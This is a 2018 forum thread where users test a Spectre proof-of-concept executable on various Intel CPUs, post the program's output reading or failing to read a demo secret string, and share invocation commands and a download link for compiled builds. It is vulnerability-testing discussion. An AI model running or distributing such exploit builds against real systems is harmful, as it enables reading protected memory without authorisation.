Spectre_Meltdown Erik August + Stephan Vanderkhof Poc

[Sampei.Nihira]

25 minutes ago, Yellow Horror said:

Seems that it can't read "the secret string" on my Pentium 4:

L:\>spectre.exe
Using a cache hit threshold of 80.
Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001025... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001026... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001027... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001028... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001029... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102b... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102c... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102e... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102f... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001030... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001031... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001032... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001033... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001034... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001035... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001036... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001037... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001038... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001039... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103b... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103c... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103e... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103f... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001040... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001041... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001042... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001043... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001044... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001045... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001046... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001047... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001048... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001049... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000104a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000104b... Success: 0xFF=’?’ score=0

 

Vulnerable.

[Sampei.Nihira]

My PC W.10 1709 x64 + Microsoft Patch

Intel Dual Core E6700

Vulnerable.

[UCyborg]

Something's fishy here, check the example output from the project's GitHub page. Don't forget you can also specify cache hit threshold.

Edited January 27, 2018 by UCyborg

[rloew]

It doesn't work. I got the same result when I tried to compile the original code myself.

[UCyborg]

Here are the updated executables, there are both SSE and SSE2 versions and the issue with garbled text has been fixed by using more widely supported ' character instead of ’.

https://drive.google.com/open?id=1WG-62M9ZZwDXNf0xlhx6NhR-_gtDv7AC

[UCyborg]

I got the expected output with SSE2 version by invoking it like this:

spectre-sse2.exe 100

I'm no expert, but isn't this supposed to be the kind of vulnerability that is difficult to exploit? Might take a clever hacker to put this to use in practice.

[dencorso]

Thankfully its unreliable (and requires access to the machine) 'cause most of us won't get any fix.

Here I have an i7 3770K / Z68 (2nd gen and vunerable) on XP SP3 fully up-to-date.
The SSE2 works OK the SSE version fails. The output is below in the spoiler:

S:\>spectre-sse2 40

Using a cache hit threshold of 40.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0x54='T' score=2
Reading at malicious_x = 00001025... Success: 0x68='h' score=2
Reading at malicious_x = 00001026... Success: 0x65='e' score=2
Reading at malicious_x = 00001027... Success: 0x20=' ' score=2
Reading at malicious_x = 00001028... Success: 0x4D='M' score=2
Reading at malicious_x = 00001029... Success: 0x61='a' score=2
Reading at malicious_x = 0000102a... Success: 0x67='g' score=2
Reading at malicious_x = 0000102b... Success: 0x69='i' score=2
Reading at malicious_x = 0000102c... Success: 0x63='c' score=2
Reading at malicious_x = 0000102d... Success: 0x20=' ' score=2
Reading at malicious_x = 0000102e... Success: 0x57='W' score=2
Reading at malicious_x = 0000102f... Success: 0x6F='o' score=2
Reading at malicious_x = 00001030... Success: 0x72='r' score=2
Reading at malicious_x = 00001031... Success: 0x64='d' score=2
Reading at malicious_x = 00001032... Success: 0x73='s' score=2
Reading at malicious_x = 00001033... Success: 0x20=' ' score=2
Reading at malicious_x = 00001034... Success: 0x61='a' score=2
Reading at malicious_x = 00001035... Success: 0x72='r' score=2
Reading at malicious_x = 00001036... Success: 0x65='e' score=2
Reading at malicious_x = 00001037... Success: 0x20=' ' score=2
Reading at malicious_x = 00001038... Success: 0x53='S' score=2
Reading at malicious_x = 00001039... Success: 0x71='q' score=2
Reading at malicious_x = 0000103a... Success: 0x75='u' score=2
Reading at malicious_x = 0000103b... Success: 0x65='e' score=2
Reading at malicious_x = 0000103c... Success: 0x61='a' score=2
Reading at malicious_x = 0000103d... Success: 0x6D='m' score=2
Reading at malicious_x = 0000103e... Success: 0x69='i' score=2
Reading at malicious_x = 0000103f... Success: 0x73='s' score=2
Reading at malicious_x = 00001040... Success: 0x68='h' score=2
Reading at malicious_x = 00001041... Success: 0x20=' ' score=2
Reading at malicious_x = 00001042... Success: 0x4F='O' score=2
Reading at malicious_x = 00001043... Success: 0x73='s' score=2
Reading at malicious_x = 00001044... Success: 0x73='s' score=2
Reading at malicious_x = 00001045... Success: 0x69='i' score=2
Reading at malicious_x = 00001046... Success: 0x66='f' score=2
Reading at malicious_x = 00001047... Success: 0x72='r' score=2
Reading at malicious_x = 00001048... Success: 0x61='a' score=2
Reading at malicious_x = 00001049... Success: 0x67='g' score=2
Reading at malicious_x = 0000104a... Success: 0x65='e' score=2
Reading at malicious_x = 0000104b... Success: 0x2E='.' score=2

S:\>spectre-sse 40
Using a cache hit threshold of 40.
Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Unclear: 0x11='?' score=921 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001025... Unclear: 0x67='g' score=925 (second best: 0xEF='?' score=924)
Reading at malicious_x = 00001026... Unclear: 0x16='?' score=932 (second best: 0x64='d' score=918)
Reading at malicious_x = 00001027... Unclear: 0x67='g' score=923 (second best: 0x5F='_' score=918)
Reading at malicious_x = 00001028... Unclear: 0x67='g' score=917 (second best: 0x23='#' score=917)
Reading at malicious_x = 00001029... Unclear: 0x67='g' score=924 (second best: 0x21='!' score=921)
Reading at malicious_x = 0000102a... Unclear: 0x16='?' score=917 (second best: 0x39='9' score=915)
Reading at malicious_x = 0000102b... Unclear: 0x16='?' score=932 (second best: 0x11='?' score=928)
Reading at malicious_x = 0000102c... Unclear: 0x67='g' score=929 (second best: 0x64='d' score=926)
Reading at malicious_x = 0000102d... Unclear: 0xCF='?' score=934 (second best: 0x12='?' score=929)
Reading at malicious_x = 0000102e... Unclear: 0x91='?' score=918 (second best: 0x21='!' score=918)
Reading at malicious_x = 0000102f... Unclear: 0x16='?' score=916 (second best: 0xB8='?' score=914)
Reading at malicious_x = 00001030... Unclear: 0x67='g' score=922 (second best: 0x64='d' score=919)
Reading at malicious_x = 00001031... Unclear: 0x16='?' score=934 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001032... Unclear: 0x11='?' score=924 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001033... Unclear: 0x5F='_' score=926 (second best: 0x16='?' score=918)
Reading at malicious_x = 00001034... Unclear: 0x67='g' score=924 (second best: 0x16='?' score=919)
Reading at malicious_x = 00001035... Unclear: 0x7C='|' score=916 (second best: 0x11='?' score=913)
Reading at malicious_x = 00001036... Unclear: 0x11='?' score=926 (second best: 0x7C='|' score=923)
Reading at malicious_x = 00001037... Unclear: 0x11='?' score=924 (second best: 0x64='d' score=919)
Reading at malicious_x = 00001038... Unclear: 0xC3='?' score=920 (second best: 0xB8='?' score=919)
Reading at malicious_x = 00001039... Unclear: 0x5F='_' score=919 (second best: 0x11='?' score=918)
Reading at malicious_x = 0000103a... Unclear: 0x11='?' score=928 (second best: 0x7C='|' score=926)
Reading at malicious_x = 0000103b... Unclear: 0x16='?' score=924 (second best: 0x15='?' score=917)
Reading at malicious_x = 0000103c... Unclear: 0x2B='+' score=918 (second best: 0x23='#' score=917)
Reading at malicious_x = 0000103d... Unclear: 0x94='?' score=916 (second best: 0xED='?' score=914)
Reading at malicious_x = 0000103e... Unclear: 0x67='g' score=938 (second best: 0x16='?' score=923)
Reading at malicious_x = 0000103f... Unclear: 0x15='?' score=927 (second best: 0x67='g' score=925)
Reading at malicious_x = 00001040... Unclear: 0x12='?' score=938 (second best: 0x11='?' score=937)
Reading at malicious_x = 00001041... Unclear: 0x67='g' score=953 (second best: 0xEF='?' score=921)
Reading at malicious_x = 00001042... Unclear: 0x67='g' score=936 (second best: 0x15='?' score=917)
Reading at malicious_x = 00001043... Unclear: 0x23='#' score=921 (second best: 0xEF='?' score=918)
Reading at malicious_x = 00001044... Unclear: 0x11='?' score=920 (second best: 0x22='"' score=910)
Reading at malicious_x = 00001045... Unclear: 0x11='?' score=934 (second best: 0x23='#' score=931)
Reading at malicious_x = 00001046... Unclear: 0x67='g' score=929 (second best: 0x91='?' score=914)
Reading at malicious_x = 00001047... Unclear: 0xEF='?' score=917 (second best: 0x67='g' score=915)
Reading at malicious_x = 00001048... Unclear: 0x16='?' score=929 (second best: 0x11='?' score=914)
Reading at malicious_x = 00001049... Unclear: 0x5F='_' score=924 (second best: 0x23='#' score=920)
Reading at malicious_x = 0000104a... Unclear: 0xAF='?' score=929 (second best: 0x16='?' score=925)
Reading at malicious_x = 0000104b... Unclear: 0x67='g' score=935 (second best: 0x15='?' score=922)

[Yellow Horror]

I try the exploit on a few hardware sets and figure out:

• The "SSE2" version works successfully on i3 CPU under XP and unpatched 7 (with threshold 32 or more).
• The "SSE" version starts but can't read "the secret string" anywhere, even in the vulnerable environment from previous point (i try some different thresholds from 40 to 1000).
• The "SSE2" version don't work on Pentium 4 (expected, because it don't support SSE2) and on Core 2 CPU that definitely supports SSE2. It exits with error before finishing the first "reading at..." message.
• MSE is angry about SSE2 version.

Edited January 27, 2018 by Yellow Horror

[UCyborg]

I compiled 2 more versions (see link in one of my previous posts), one that has SSE2 but doesn't utilize RDTSCP instruction (not related to SSE2) and another without SSE2 but with RDTSCP (rather pointless, I was curious if it would output the magic string).

Wondering if there's a CPU out there that would work with SSE version, or if there's something off in the code or maybe exploit simply doesn't work that way, who knows. The first set of extra instructions that predates SSE is MMX if I remember correctly. Isn't it supposed to work on CPUs without any such extensions? If so, we'd need a test that works on such CPUs.

Supposedly there are certain x86 only CPUs that have SSE2, but not RDTSCP (the reason for the crash @Sampei.Nihira mentioned?).

Edited January 27, 2018 by UCyborg

[Sampei.Nihira]

32 minutes ago, UCyborg said:

I compiled 2 more versions (see link in one of my previous posts), one that has SSE2 but doesn't utilize RDTSCP instruction (not related to SSE2) and another without SSE2 but with RDTSCP (rather pointless, I was curious if it would output the magic string).

Wondering if there's a CPU out there that would work with SSE version, or if there's something off in the code or maybe exploit simply doesn't work that way, who knows. The first set of extra instructions that predates SSE is MMX if I remember correctly. Isn't it supposed to work on CPUs without any such extensions? If so, we'd need a test that works on such CPUs.

Supposedly there are certain x86 only CPUs that have SSE2, but not RDTSCP (the reason for the crash @Sampei.Nihira mentioned?).

Run simultaneously in the same PC:

The one below is unreliable.

Pentium Dual Core E6700 W.10 1709 x64:

 

 

[Yellow Horror]

51 minutes ago, UCyborg said:

I compiled 2 more versions

• "SSE2 w/o RDTSCP" can't read "the secret string" on i3 with any threshold i try.
• "SSE2 w/o RDTSCP" on Core 2 give me some (very unstable) results (few letters of "secret sting" in their right positions, garbage in other positions) with default threshold. With any threshold i try to enter manually it give complete garbage.
• Both "SSE" versions don't read "the string" on i3.
• "SSE+RDTSCP" don't work on Core 2.

For now it seems that Core 2 and older CPU's are invulnerable to this realization of exploit, but may be vulnerable to a better crafted one (due to partial success of "SSE2 w/o RDTSCP" version on Core 2). This is a bad news, i think.

Edited January 27, 2018 by Yellow Horror

[UCyborg]

27 minutes ago, Sampei.Nihira said:

The one below is unreliable.

You need to get a result like this:

 

Using a cache hit threshold of 90.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0x54='T' score=2
Reading at malicious_x = 00001025... Success: 0x68='h' score=2
Reading at malicious_x = 00001026... Success: 0x65='e' score=2
Reading at malicious_x = 00001027... Success: 0x20=' ' score=2
Reading at malicious_x = 00001028... Success: 0x4D='M' score=2
Reading at malicious_x = 00001029... Success: 0x61='a' score=2
Reading at malicious_x = 0000102a... Success: 0x67='g' score=2
Reading at malicious_x = 0000102b... Success: 0x69='i' score=2
Reading at malicious_x = 0000102c... Success: 0x63='c' score=2
Reading at malicious_x = 0000102d... Success: 0x20=' ' score=2
Reading at malicious_x = 0000102e... Success: 0x57='W' score=2
Reading at malicious_x = 0000102f... Success: 0x6F='o' score=2
Reading at malicious_x = 00001030... Success: 0x72='r' score=2
Reading at malicious_x = 00001031... Success: 0x64='d' score=2
Reading at malicious_x = 00001032... Success: 0x73='s' score=2
Reading at malicious_x = 00001033... Success: 0x20=' ' score=2
Reading at malicious_x = 00001034... Success: 0x61='a' score=2
Reading at malicious_x = 00001035... Success: 0x72='r' score=2
Reading at malicious_x = 00001036... Success: 0x65='e' score=2
Reading at malicious_x = 00001037... Success: 0x20=' ' score=2
Reading at malicious_x = 00001038... Success: 0x53='S' score=2
Reading at malicious_x = 00001039... Success: 0x71='q' score=2
Reading at malicious_x = 0000103a... Success: 0x75='u' score=2
Reading at malicious_x = 0000103b... Success: 0x65='e' score=2
Reading at malicious_x = 0000103c... Success: 0x61='a' score=2
Reading at malicious_x = 0000103d... Success: 0x6D='m' score=7 (second best: 0x2
9=')' score=1)
Reading at malicious_x = 0000103e... Success: 0x69='i' score=2
Reading at malicious_x = 0000103f... Success: 0x73='s' score=2
Reading at malicious_x = 00001040... Success: 0x68='h' score=2
Reading at malicious_x = 00001041... Success: 0x20=' ' score=2
Reading at malicious_x = 00001042... Success: 0x4F='O' score=2
Reading at malicious_x = 00001043... Success: 0x73='s' score=2
Reading at malicious_x = 00001044... Success: 0x73='s' score=2
Reading at malicious_x = 00001045... Success: 0x69='i' score=2
Reading at malicious_x = 00001046... Success: 0x66='f' score=2
Reading at malicious_x = 00001047... Success: 0x72='r' score=2
Reading at malicious_x = 00001048... Success: 0x61='a' score=2
Reading at malicious_x = 00001049... Success: 0x67='g' score=2
Reading at malicious_x = 0000104a... Success: 0x65='e' score=2
Reading at malicious_x = 0000104b... Success: 0x2E='.' score=2

Read "The Magic Words are Squeamish Ossifrage." vertically. If you got something else, then it didn't work. You may also need to change cache hit threshold value by invoking the program like this:

spectre-sse2.exe 90

Try some values between 40 - 300 for example.

Edited January 27, 2018 by UCyborg

[Sampei.Nihira]

I can not make it this with the Pentium Dual Core E6700
The characters for each cache (20-400) value are always "?".

Can I start both spectre-sse.exe and spectre-sse2.exe.

________________________________________________

In PC with XP (Pentium Celeron M380) it works without setting up cache.

File Spectre-sse2.exe (and pause):

 

Edited January 28, 2018 by Sampei.Nihira

[wyxchari]

22 hours ago, Sampei.Nihira said:

Intel Celeron M380 with FSB:

Vulnerable to Spectre.

Pentium Dual Core E6700 with FSB:

Vulnerable to Spectre.

You're right. According to this very reliable article, they are affected from the Pentium Pro (1995): https://disruptiveludens.wordpress.com/2018/01/05/meltdown-y-spectre/

Intel processors affected in all variants: Pentium Pro, Pentium II, Pentium III, Pentium 4, Pentium D, Pentium M, Core 2 Duo, Core 2 Quad, ... And continue with the expanded official list that Intel published: https://www.techarp.com/guides/complete-meltdown-spectre-cpu-list/

Not affected: Atom before 2013, Itanium.

Edited February 2, 2018 by wyxchari

[Sampei.Nihira]

Correct.

Pentium Pro is the first processor to use the Speculative Execution.

 

Quote

.........The Pentium Pro thus featured out of order execution, including speculative execution..............

.

 

https://en.wikipedia.org/wiki/Pentium_Pro

Edited February 2, 2018 by Sampei.Nihira